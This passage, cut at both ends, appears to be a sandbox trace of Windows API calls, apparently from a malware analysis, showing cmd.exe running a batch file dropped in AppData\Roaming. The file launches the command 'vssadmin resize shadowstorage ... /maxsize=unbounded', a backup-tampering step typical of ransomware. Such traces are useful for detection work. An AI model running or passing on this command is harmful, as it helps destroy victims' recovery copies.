0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8258 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0035.904] GetProcessHeap () returned 0x3e0000 [0035.904] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0035.905] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.905] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c2 [0035.905] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x16ff, lpOverlapped=0x0) returned 1 [0035.905] SetFilePointer (in: hFile=0x74, lDistanceToMove=515, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x203 [0035.905] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=65, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded\r\n") returned 65 [0035.905] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.905] GetFileType (hFile=0x74) returned 0x1 [0035.905] _get_osfhandle (_FileHandle=3) returned 0x74 [0035.905] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x203 [0035.905] GetProcessHeap () returned 0x3e0000 [0035.905] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3f9ad8 [0035.905] GetProcessHeap () returned 0x3e0000 [0035.905] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f9ad8 | out: hHeap=0x3e0000) returned 1 [0035.905] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f81f8 [0035.905] GetProcessHeap () returned 0x3e0000 [0035.905] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x1a) returned 0x3f6158 [0035.905] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x78) returned 0x3f0ee0 [0035.906] _tell (_FileHandle=3) returned 515 [0035.906] _close (_FileHandle=3) returned 0 [0035.906] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0035.906] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0035.906] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0035.906] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0035.906] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0035.906] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0035.906] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0035.906] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0035.906] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0035.906] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0035.906] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0035.906] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0035.906] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0035.906] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0035.906] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0035.906] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0035.906] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0035.906] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0035.906] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0035.906] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0035.906] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0035.906] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0035.906] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0035.906] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0035.906] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0035.907] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0035.907] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0035.907] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0035.907] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0035.907] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0035.907] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0035.907] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0035.907] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0035.907] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0035.907] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0035.907] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0035.907] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0035.907] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0035.907] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0035.907] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0035.907] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0035.907] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0035.907] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0035.907] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0035.907] SetErrorMode (uMode=0x0) returned 0x1 [0035.907] GetProcessHeap () returned 0x3e0000 [0035.907] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x66) returned 0x3f6cf0 [0035.907] GetProcessHeap () returned 0x3e0000 [0035.907] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x66 [0035.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.907] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.907] GetProcessHeap () returned 0x3e0000 [0035.907] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d60 [0035.907] GetProcessHeap () returned 0x3e0000 [0035.907] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e88 [0035.907] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x122) returned 0x3f6e88 [0035.908] GetProcessHeap () returned 0x3e0000 [0035.908] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x122 [0035.908] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.908] GetProcessHeap () returned 0x3e0000 [0035.908] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f6fb8 [0035.908] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6fb8, Size=0x76) returned 0x3f6fb8 [0035.908] GetProcessHeap () returned 0x3e0000 [0035.908] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6fb8) returned 0x76 [0035.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.908] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.908] GetLastError () returned 0x2 [0035.908] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.908] GetLastError () returned 0x2 [0035.908] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.908] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.908] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.908] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0035.909] GetLastError () returned 0x2 [0035.909] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8258 [0035.909] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.909] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.909] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.909] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.909] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f7038 [0035.909] GetProcessHeap () returned 0x3e0000 [0035.909] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x8a) returned 0x3f7250 [0035.909] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f4280 [0035.909] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f4288, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0035.909] SetErrorMode (uMode=0x0) returned 0x1 [0035.909] GetProcessHeap () returned 0x3e0000 [0035.909] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f4280, Size=0x66) returned 0x3f4280 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f4280) returned 0x66 [0035.910] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.910] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f72e8 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7410 [0035.910] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7410, Size=0x122) returned 0x3f7410 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7410) returned 0x122 [0035.910] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7540 [0035.910] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7540, Size=0x76) returned 0x3f7540 [0035.910] GetProcessHeap () returned 0x3e0000 [0035.910] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7540) returned 0x76 [0035.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.910] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.910] GetLastError () returned 0x2 [0035.910] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.910] GetLastError () returned 0x2 [0035.910] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.911] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.911] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.911] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0035.911] GetLastError () returned 0x2 [0035.911] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8258 [0035.911] FindClose (in: hFindFile=0x3f8258 | out: hFindFile=0x3f8258) returned 1 [0035.911] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.911] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.911] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.911] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0035.911] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0035.911] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0035.911] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3ef4b0 [0035.911] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.911] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0035.911] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.912] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.913] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.913] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.913] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0035.913] GetProcessHeap () returned 0x3e0000 [0035.913] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0035.913] GetProcessHeap () returned 0x3e0000 [0035.913] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a58 [0035.913] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.913] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa8c, dwThreadId=0xa90)) returned 1 [0035.917] CloseHandle (hObject=0x74) returned 1 [0035.917] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.917] GetProcessHeap () returned 0x3e0000 [0035.917] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0035.918] GetEnvironmentStringsW () returned 0x3f8408* [0035.918] GetProcessHeap () returned 0x3e0000 [0035.918] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0035.918] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0035.918] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0036.034] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0036.034] CloseHandle (hObject=0x78) returned 1 [0036.034] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0036.034] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0036.034] GetProcessHeap () returned 0x3e0000 [0036.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.034] GetEnvironmentStringsW () returned 0x3f8408* [0036.034] GetProcessHeap () returned 0x3e0000 [0036.034] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.034] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.034] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0036.034] GetProcessHeap () returned 0x3e0000 [0036.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0036.034] GetEnvironmentStringsW () returned 0x3f8408* [0036.034] GetProcessHeap () returned 0x3e0000 [0036.034] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0036.034] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0036.034] GetProcessHeap () returned 0x3e0000 [0036.034] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0036.034] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0036.034] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.034] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0036.034] _get_osfhandle (_FileHandle=1) returned 0x264 [0036.034] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0036.035] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.035] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0036.035] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0036.035] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0036.035] SetConsoleInputExeNameW () returned 0x1 [0036.035] GetConsoleOutputCP () returned 0x1b5 [0036.035] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0036.035] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.036] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0036.036] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0036.036] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.036] SetFilePointer (in: hFile=0x78, lDistanceToMove=515, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x203 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7540 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7410 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72e8 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4280 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7250 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7038 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb8 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d60 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f0ee0 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6158 | out: hHeap=0x3e0000) returned 1 [0036.036] GetProcessHeap () returned 0x3e0000 [0036.036] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0036.037] _get_osfhandle (_FileHandle=3) returned 0x78 [0036.037] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x203 [0036.037] ReadFile (in: hFile=0x78, 